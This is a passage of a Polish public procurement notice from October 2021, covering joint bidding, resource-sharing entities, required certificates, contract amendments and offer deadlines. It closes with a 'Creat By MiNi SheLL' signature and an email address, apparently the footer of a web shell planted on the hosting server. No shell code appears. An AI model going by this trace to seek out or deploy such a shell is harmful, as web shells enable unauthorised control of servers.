udostępniającego zasoby;<br/>2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą.<br/>7. Zamawiający ocenia, czy udostępniane wykonawcy przez podmioty udostępniające zasoby<br/>zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na<br/>wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w<br/>art. 112 ust. 2 pkt 3 i 4, oraz, jeżeli to dotyczy, kryteriów selekcji, a także bada, czy nie zachodzą<br/>wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem wykonawcy.<br/>8. Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z<br/>wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną<br/>przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za<br/>nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>9. Zgodnie z art. 122 ustawy jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna<br/>lub finansowa podmiotu udostępniającego zasoby nie potwierdzają spełniania przez wykonawcę<br/>warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia,<br/>zamawiający żąda, aby wykonawca w terminie określonym przez zamawiającego zastąpił ten<br/>podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki<br/>udziału w postępowaniu.<br/>10. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub<br/>sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania wniosków o<br/>dopuszczenie do udziału w postępowaniu albo ofert nie polegał on w danym zakresie na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>Wykonawcy wspólnie ubiegający się o udzielnie zamówienia:<br/>11. Wykonawcy mogą wspólnie ubiegać się o udzielnie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do ich reprezentowania albo do reprezentowania i<br/>zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno być załączone<br/>do oferty.<br/>12. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o<br/>którym mowa w ust. 1 składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie,<br/>w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub<br/>kryteriów selekcji.<br/>13. Zgodnie z art. 117 ust. 2 ustawy Pzp warunek dotyczący uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2, jest<br/>spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te<br/>uprawnienia są wymagane.<br/>14. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>Ogłoszenie nr 2021/BZP 00226400/01 z dnia 2021-10-08<br/>2021-10-08 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane.<br/>15. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego<br/>kopii umowy regulującej współpracę tych wykonawców.<br/>16. W przypadku, o którym mowa w art. 117 ust. 2 i 3 ustawy , wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia dołączają odpowiednio do wniosku o dopuszczenie do udziału w<br/>postępowaniu albo do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy<br/>lub usługi wykonają poszczególni wykonawcy.<br/>17. W przypadku wykonawców wspólnie ubiegających się o udzielnie zamówienia:<br/>1) Warunek udziału w postępowaniu, określone przez Zamawiającego w części V ust. 2 SWZ<br/>musi być spełniony przez wykonawców łącznie;<br/>2) Brak podstaw do wykluczenia z postępowania musi zostać wykazany przez każdego z<br/>wykonawców. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów załącznik Nr 4 do SWZ.<br/>2) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu<br/>albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub<br/>opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>3) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy,<br/>wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem<br/>terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne<br/>lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>4) Odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>7. W przypadku wykonawców wspólnie ubiegających się o udzielnie zamówienia dokumenty wymagane<br/>w części VI pust. 6 pkt 1-4 lub w części VI ust. 8 SWZ winny być złożone przez każdego z<br/>wykonawców.<br/>8. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej<br/>zamiast:<br/>1) zaświadczenia, o którym mowa w części VI ust. 6 pkt 2 SWZ(zaświadczenie z urzędu skarbowego),<br/>2) zaświadczenia albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem<br/>składek na ubezpieczenia społeczne lub zdrowotne, o którym mowa w części VI ust. 6 pkt 3 SWZ<br/>(zaświadczenie z ZUS),<br/>3) odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, o których mowa w części VI ust. 6 pkt 4 SWZ<br/>- składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające odpowiednio, że:<br/>a) nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie<br/>społeczne lub zdrowotne,<br/>b) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje<br/>się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach<br/>miejsca wszczęcia tej procedury.<br/>9. Dokumenty, o których mowa w o którym mowa w części VI ust. 6 pkt 2-4 SWZ powinny być<br/>wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty wykonawca zobowiązany jest dołączyć aktualne na dzień<br/>składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz niepodleganiu<br/>wykluczeniu, w zakresie wskazanym przez zamawiającego zgodnie z art. 125 ust. 1 – załącznik nr 2 do<br/>SWZ.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym<br/>mowa w ust. 1 składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia<br/>oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>3. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, przedstawia, wraz z oświadczeniem o niepodleganiu wykluczeniu, spełnianiu warunków<br/>udziału w postępowaniu lub kryteriów selekcji, w zakresie wskazanym przez zamawiającego, także<br/>oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego<br/>podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>4. W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu lub kryteriów<br/>selekcji dotyczących sytuacji ekonomicznej lub finansowej zamawiający żąda następujących<br/>podmiotowych środków dowodowych: Nie dotyczy<br/>5. W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu lub kryteriów<br/>selekcji dotyczących zdolności technicznej lub zawodowej, zamawiający żądać następujących<br/>podmiotowych środków dowodowych:<br/>1) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami– załącznik nr 3 do<br/>SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawcy zobowiązani są wraz z ofertą złożyć następujące dokumenty oraz oświadczenia:<br/>1)Formularz ofertowy - wypełniony i podpisany przez wykonawcę – Załącznik nr 1do SWZ.<br/>W formularzu ofertowym, wykonawca ma obowiązek:<br/>a) poinformowania zamawiającego, że wybór jego oferty będzie prowadził do powstania u<br/>zamawiającego obowiązku podatkowego;<br/>b) wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą<br/>prowadziły do powstania obowiązku podatkowego;<br/>c) wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym zamawiającego,<br/>bez kwoty podatku;<br/>d) wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą wykonawcy, będzie<br/>miała zastosowanie.<br/>2)oświadczenie o spełnianiu warunków udziału w postępowaniu oraz niepodleganiu wykluczeniu,<br/>w zakresie wskazanym przez zamawiającego zgodnie z art. 125 ust. 1 – załącznik nr 2 do SWZ ;<br/>2) Zobowiązanie innego podmiotu– załącznik nr 5 (jeżeli dotyczy)3) Dokumenty, z których wynika prawo do podpisania oferty. Oferta powinna być podpisana<br/>przez osoby uprawnione do reprezentowania wykonawcy. W celu potwierdzenia, że osoba<br/>działająca w imieniu wykonawcy jest umocowana do reprezentowania, Zamawiający żąda od<br/>wykonawcy odpisu lub informacji z KRS, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru.<br/>5. Ofertę składa się pod rygorem nieważności w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem kwalifikowalnym. Aby uniknąć wątpliwości Zamawiający<br/>wskazuje, że nie spełnia wymogów o jakich mowa w art. 63 ust. 2 PZP oświadczenie w formie<br/>podpisanego własnoręcznie skanu, nieopatrzonego podpisem kwalifikowanym albo podpisem<br/>zaufanym lub osobistym.<br/>6. Oferta powinna być sporządzona w języku polskim. Dokumenty składające się na ofertę<br/>sporządzone w języku obcym winny być składane wraz z tłumaczeniem na język polski. Każdy<br/>dokument składający się na ofertę powinien być czytelny.<br/>7. Zaleca się aby każdy dokument zawierający tajemnice przedsiębiorstwa został zamieszczony<br/>w odrębnym pliku.<br/>8. Przed upływem terminu składania ofert, Wykonawca może wprowadzić zmiany do złożonej<br/>oferty lub wycofać ofertę. W celu dokonania zmian w złożonej ofercie lub wycofania oferty<br/>należy postępować zgodnie z instrukcją użytkownika zamieszczona na Platformie.<br/>9. Wszystkie koszty związane z uczestnictwem w postępowaniu, w szczególności z<br/>przygotowaniem i złożeniem ofert ponosi wykonawca składający ofertę. Zamawiający nie<br/>przewiduje w tym zakresie zwrotu kosztów.<br/>10. Na wezwanie zamawiającego w trakcie oceny i badania ofert Wykonawcy zobowiązani są<br/>złożyć następujące dokumenty oraz oświadczenia:<br/>1) Aktualne zaświadczenie z ZUS, o którym mowa w Części VI SWZ;<br/>2) Aktualne zaświadczenie z Urzędu Skarbowego, o którym mowa w Części VI SWZ;<br/>3) Wykaz osób – załącznik nr 3 do SWZ<br/>4) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do<br/>tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji<br/>i konsumentów – załącznik nr 4 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielnie zamówienia:<br/>11. Wykonawcy mogą wspólnie ubiegać się o udzielnie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do ich reprezentowania albo do reprezentowania i<br/>zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno być załączone<br/>do oferty.<br/>12. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o<br/>którym mowa w ust. 1 składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie,<br/>w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub<br/>kryteriów selekcji.<br/>13. Zgodnie z art. 117 ust. 2 ustawy Pzp warunek dotyczący uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2, jest<br/>spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzieleniezamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te<br/>uprawnienia są wymagane.<br/>14. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane.<br/>15. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego<br/>kopii umowy regulującej współpracę tych wykonawców.<br/>16. W przypadku, o którym mowa w art. 117 ust. 2 i 3 ustawy , wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia dołączają odpowiednio do wniosku o dopuszczenie do udziału w<br/>postępowaniu albo do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy<br/>lub usługi wykonają poszczególni wykonawcy.<br/>17. W przypadku wykonawców wspólnie ubiegających się o udzielnie zamówienia:<br/>1) Warunek udziału w postępowaniu, określone przez Zamawiającego w części V ust. 2 SWZ<br/>musi być spełniony przez wykonawców łącznie;<br/>2) Brak podstaw do wykluczenia z postępowania musi zostać wykazany przez każdego z<br/>wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany umowy wymagają formy pisemnego aneksu do umowy pod rygorem<br/>nieważności.<br/>2. Zamawiający przewiduje katalog zmian umowy, na które strony mogą się powoływać w<br/>niniejszym postępowaniu. Katalog zmian obejmuje wystąpienie niżej wymienionych okoliczności:<br/>1) siły wyższej, to znaczy niezależnego od stron losowego zdarzenia zewnętrznego, które było<br/>niemożliwe do przewidzenia w momencie zawarcia umowy i któremu nie można było zapobiec<br/>mimo dochowania należytej staranności, lub takiego, którego przewidzenie skutków nie było<br/>możliwe w momencie zawarcia umowy w tym w szczególności stanu zagrożenia<br/>epidemiologicznego, bądź epidemii.<br/>2) zmiany osób przewidzianych do realizacji przedmiotu zamówienia na warunkach określonych<br/>w § 5 umowy,<br/>3) innych przyczyn zewnętrznych niezależnych od Zamawiającego oraz Wykonawcy<br/>skutkujących niemożliwością prowadzenia prac lub wykonywania innych czynności<br/>przewidzianych umową,<br/>4) zmiany wynikające ze zmiany umowy o dofinansowanie lub wytycznych podmiotu<br/>dofinansowującego realizację zadania,<br/>5) zmiana terminu realizacji przedmiotu umowy z uwagi na wystąpienie obiektywnych<br/>przesłanek.<br/>Szczegółowe warunki zmian umowy zawarte są we wzorze umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-22 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pzp.opolelubelskie.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-22 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com